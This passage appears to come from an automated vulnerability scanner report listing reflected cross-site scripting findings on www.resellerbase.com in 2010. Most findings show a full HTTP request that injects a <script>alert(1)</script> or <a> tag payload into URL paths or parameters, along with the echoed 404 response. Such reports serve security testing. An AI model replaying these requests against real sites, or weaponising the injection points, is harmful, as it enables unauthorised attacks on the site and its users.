<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/131c49d<script>alert(1)</script>5f7335e068d/ was not found on this server.</p>
...[SNIP]...

2.1089. http://www.resellerbase.com/detail/13/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/13/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2479c<script>alert(1)</script>5e384c0b479 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/13/?2479c<script>alert(1)</script>5e384c0b479=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/13/?2479c<script>alert(1)</script>5e384c0b479=1 was not found on this server.</p>
...[SNIP]...

2.1090. http://www.resellerbase.com/detail/13/hostgator-com.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/13/hostgator-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 87352<script>alert(1)</script>11b0ecc7cee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail87352<script>alert(1)</script>11b0ecc7cee/13/hostgator-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/browsepr.php?pr=8
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail87352<script>alert(1)</script>11b0ecc7cee/13/hostgator-com.html was not found on this server.</p>
...[SNIP]...

2.1091. http://www.resellerbase.com/detail/13/hostgator-com.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/13/hostgator-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b2c36<script>alert(1)</script>c8ce7a5bbe6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/13/b2c36<script>alert(1)</script>c8ce7a5bbe6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/browsepr.php?pr=8
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/13/b2c36<script>alert(1)</script>c8ce7a5bbe6 was not found on this server.</p>
...[SNIP]...

2.1092. http://www.resellerbase.com/detail/13/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/13/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 13c05<script>alert(1)</script>a6ce8157ce6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail13c05<script>alert(1)</script>a6ce8157ce6/13/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail13c05<script>alert(1)</script>a6ce8157ce6/13/rating.php was not found on this server.</p>
...[SNIP]...

2.1093. http://www.resellerbase.com/detail/13/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/13/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 58121<script>alert(1)</script>fe2177ab6d15944d7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail58121<script>alert(1)</script>fe2177ab6d15944d7/13/rating.php?id=13&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/13/hostgator-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail58121<script>alert(1)</script>fe2177ab6d15944d7/13/rating.php?id=13&rating=5 was not found on this server.</p>
...[SNIP]...

2.1094. http://www.resellerbase.com/detail/13/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/13/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 98978<script>alert(1)</script>1fa8fb3a733a04ceb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/1398978<script>alert(1)</script>1fa8fb3a733a04ceb/rating.php?id=13&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/13/hostgator-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1398978<script>alert(1)</script>1fa8fb3a733a04ceb/rating.php?id=13&rating=5 was not found on this server.</p>
...[SNIP]...

2.1095. http://www.resellerbase.com/detail/13/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/13/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4f420<script>alert(1)</script>d077cf18770 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/134f420<script>alert(1)</script>d077cf18770/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/134f420<script>alert(1)</script>d077cf18770/rating.php was not found on this server.</p>
...[SNIP]...

2.1096. http://www.resellerbase.com/detail/13/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/13/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9fa6b<script>alert(1)</script>53c01221468 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/13/rating.php9fa6b<script>alert(1)</script>53c01221468 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/13/rating.php9fa6b<script>alert(1)</script>53c01221468 was not found on this server.</p>
...[SNIP]...

2.1097. http://www.resellerbase.com/detail/13/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/13/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8afef<script>alert(1)</script>f7e8b78c7cf4676f3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/13/rating.php8afef<script>alert(1)</script>f7e8b78c7cf4676f3?id=13&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/13/hostgator-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/13/rating.php8afef<script>alert(1)</script>f7e8b78c7cf4676f3?id=13&rating=5 was not found on this server.</p>
...[SNIP]...

2.1098. http://www.resellerbase.com/detail/13/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/13/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5ef64<script>alert(1)</script>169ff365b9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/13/rating.php?5ef64<script>alert(1)</script>169ff365b9a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/13/rating.php?5ef64<script>alert(1)</script>169ff365b9a=1 was not found on this server.</p>
...[SNIP]...

2.1099. http://www.resellerbase.com/detail/13/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/13/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 975a8<script>alert(1)</script>683bd0b66f0ea5046 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/13/rating.php/975a8<script>alert(1)</script>683bd0b66f0ea5046?id=13&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/13/hostgator-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/13/rating.php/975a8<script>alert(1)</script>683bd0b66f0ea5046?id=13&rating=5 was not found on this server.</p>
...[SNIP]...

2.1100. http://www.resellerbase.com/detail/13/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/13/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a09f4<script>alert(1)</script>afc89b37a6e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaila09f4<script>alert(1)</script>afc89b37a6e/13/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/13/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaila09f4<script>alert(1)</script>afc89b37a6e/13/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1101. http://www.resellerbase.com/detail/13/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/13/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6f4ec<script>alert(1)</script>101d84f7260 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/136f4ec<script>alert(1)</script>101d84f7260/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/13/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/136f4ec<script>alert(1)</script>101d84f7260/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1102. http://www.resellerbase.com/detail/13/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/13/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7d327<script>alert(1)</script>18c1f576fdb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/13/search.php7d327<script>alert(1)</script>18c1f576fdb?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/13/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/13/search.php7d327<script>alert(1)</script>18c1f576fdb?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1103. http://www.resellerbase.com/detail/13/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/13/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 4de5a<a>1d9217cb213 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/13/search.php?keyword=search...&Submit3=Search4de5a<a>1d9217cb213&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/13/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/13/search.php?keyword=search...&Submit3=Search4de5a<a>1d9217cb213&opt=2 was not found on this server.</p>
...[SNIP]...

2.1104. http://www.resellerbase.com/detail/13/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/13/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 43a0b<a>1575d5088a2 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/13/search.php?keyword=search...43a0b<a>1575d5088a2&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/13/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/13/search.php?keyword=search...43a0b<a>1575d5088a2&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1105. http://www.resellerbase.com/detail/13/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/13/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload dad29<script>alert(1)</script>6a96d55464f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/13/search.php?keyword=search...&Submit3=Search&opt=2&dad29<script>alert(1)</script>6a96d55464f=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/13/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/13/search.php?keyword=search...&Submit3=Search&opt=2&dad29<script>alert(1)</script>6a96d55464f=1 was not found on this server.</p>
...[SNIP]...

2.1106. http://www.resellerbase.com/detail/13/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/13/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 38df2<a>8f8503eb13b was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/13/search.php?keyword=search...&Submit3=Search&opt=238df2<a>8f8503eb13b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/13/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/13/search.php?keyword=search...&Submit3=Search&opt=238df2<a>8f8503eb13b was not found on this server.</p>
...[SNIP]...

2.1107. http://www.resellerbase.com/detail/13/themes/kosmos/images/rating/0.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/13/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f43b4<script>alert(1)</script>9deb24032ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailf43b4<script>alert(1)</script>9deb24032ad/13/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

